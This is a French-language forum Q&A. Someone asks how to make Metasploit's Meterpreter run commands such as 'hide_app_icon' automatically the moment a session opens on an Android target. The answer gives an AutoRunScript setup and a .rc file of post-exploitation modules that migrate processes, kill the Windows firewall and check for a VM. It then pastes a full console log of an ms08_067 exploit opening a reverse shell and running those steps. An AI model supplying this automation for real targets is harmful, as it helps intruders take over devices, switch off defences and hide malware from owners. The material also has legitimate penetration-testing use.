Existe-t-il un moyen d'exécuter automatiquement une ou plusieurs commandes meterpreter dès que l'auditeur obtient une connexion (c'est-à-dire que la session est établie avec une cible)? Je veux exécuter la commande 'hide_app_icon' dès qu'une session est gagnée. Des idées?
PS: la cible est un Android fonctionnant sur un VPS Debian.
Oui bien sûr! vous pouvez définir un fichier avec des commandes (fichier .rc) et définir ce fichier comme exécutable automatiquement.
msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc
Mettez dans le fichier .rc les commandes que vous souhaitez lancer:
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm
Ensuite, après la création d'une session, elles seront exécutées automatiquement:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.200.40:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400
meterpreter >
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*] Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*] Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Extrait de ici . J'ai copié et collé le même exemple car c'est suffisant pour l'expliquer. Et vérifiez le lien, il a des trucs plus intéressants.